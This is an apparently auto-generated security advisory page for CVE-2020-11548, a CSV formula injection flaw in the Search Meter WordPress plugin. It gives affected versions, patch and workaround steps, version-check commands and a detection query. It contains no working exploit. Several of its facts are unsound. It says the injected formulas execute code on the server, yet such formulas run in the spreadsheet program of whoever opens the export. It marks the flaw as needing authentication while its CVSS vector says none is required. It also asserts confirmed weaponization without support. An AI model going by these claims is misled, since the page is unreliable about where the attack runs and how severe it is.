Login Sign Up

CVE-2020-11548

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

This vulnerability in the Search Meter WordPress plugin allows CSV formula injection through user search input. When an administrator exports search data, malicious formulas can execute arbitrary code on the server. WordPress sites using vulnerable Search Meter plugin versions are affected.

💻 Affected Systems

Products:
  • WordPress Search Meter plugin
Versions: through 2.13.2
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires WordPress administrator to export search data via wp-admin/index.php?page=search-meter Export feature.

📦 What is this software?

Search Meter by Search Meter Project

View all CVEs affecting Search Meter →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote code execution leading to complete server compromise, data theft, and persistent backdoor installation.

🟠

Likely Case

Server compromise through command execution, potentially leading to website defacement, data exfiltration, or malware deployment.

🟢

If Mitigated

Limited impact if proper input validation and output sanitization are implemented, though some data exposure may still occur.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires administrator to export CSV data after attacker submits malicious search input.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.13.3 or later

Vendor Advisory: https://wordpress.org/plugins/search-meter/#developers

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find Search Meter plugin. 4. Click 'Update Now' if available. 5. Alternatively, download latest version from WordPress plugin repository and replace files.

🔧 Temporary Workarounds

Disable Search Meter plugin

all

Temporarily deactivate the vulnerable plugin until patched.

wp plugin deactivate search-meter

Restrict admin export access

all

Limit access to wp-admin/index.php?page=search-meter export functionality.

🧯 If You Can't Patch

  • Disable the Search Meter plugin immediately
  • Implement web application firewall rules to block CSV formula injection attempts

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin → Plugins → Search Meter version. If version is 2.13.2 or earlier, system is vulnerable.

Check Version:

wp plugin get search-meter --field=version

Verify Fix Applied:

Confirm Search Meter plugin version is 2.13.3 or later in WordPress admin panel.

📡 Detection & Monitoring

Log Indicators:

  • Unusual search queries containing formula syntax (=, +, -, @)
  • Multiple failed export attempts from admin panel
  • CSV export files with unusual content

Network Indicators:

  • HTTP POST requests to wp-admin/index.php with page=search-meter parameter
  • CSV file downloads containing formula characters

SIEM Query:

source="wordpress.log" AND ("page=search-meter" OR "search-meter export") AND ("=" OR "+" OR "-" OR "@")

📊 Metadata

CVE ID: CVE-2020-11548
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-1236
Published: April 5, 2020
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-11548, you might also want to check these:

CVE-2022-45360 9.8

This vulnerability allows CSV injection attacks in the WordPress Commenter Emails plugin. Attackers ...

Same vulnerability type (CWE-1236)
CVE-2022-45810 9.8

This CVE describes a CSV injection vulnerability in the Icegram Express WordPress plugin. Attackers ...

Same vulnerability type (CWE-1236)
CVE-2022-46803 9.8

This vulnerability allows unauthenticated attackers to inject malicious formulas into CSV files expo...

Same vulnerability type (CWE-1236)